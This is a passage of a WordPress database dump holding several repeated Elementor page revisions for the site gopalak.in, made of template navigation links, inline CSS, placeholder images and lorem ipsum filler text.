- 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:49:38','2022-09-21 07:19:38','',1373,'https://gopalak.in/?p=1402',0,'revision','',0),(1403,1,'2022-09-21 12:49:38','2022-09-21 07:19:38','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:49:38','2022-09-21 07:19:38','',1373,'https://gopalak.in/?p=1403',0,'revision','',0),(1404,1,'2022-09-21 12:49:38','2022-09-21 07:19:38','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:49:38','2022-09-21 07:19:38','',1373,'https://gopalak.in/?p=1404',0,'revision','',0),(1406,1,'2022-09-21 14:46:50','2022-09-21 09:16:50','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 14:46:50','2022-09-21 09:16:50','',1373,'https://gopalak.in/?p=1406',0,'revision','',0),(1407,1,'2022-09-21 14:46:50','2022-09-21 09:16:50','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column 